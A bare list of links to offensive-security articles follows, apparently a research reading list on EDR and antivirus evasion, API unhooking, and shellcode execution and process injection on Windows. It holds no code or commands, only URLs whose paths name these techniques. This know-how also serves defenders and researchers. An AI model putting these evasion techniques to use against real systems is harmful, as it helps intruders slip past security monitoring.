https://xz.aliyun.com/t/9166#toc-5
https://www.cnblogs.com/LyShark/p/13033722.html
https://improsec.com/tech-blog/user-mode-api-hooks-and-bypasses
https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait
https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
https://www.ired.team/offensive-security/defense-evasion/acg-arbitrary-code-guard-processdynamiccodepolicy
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://www.ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis

 
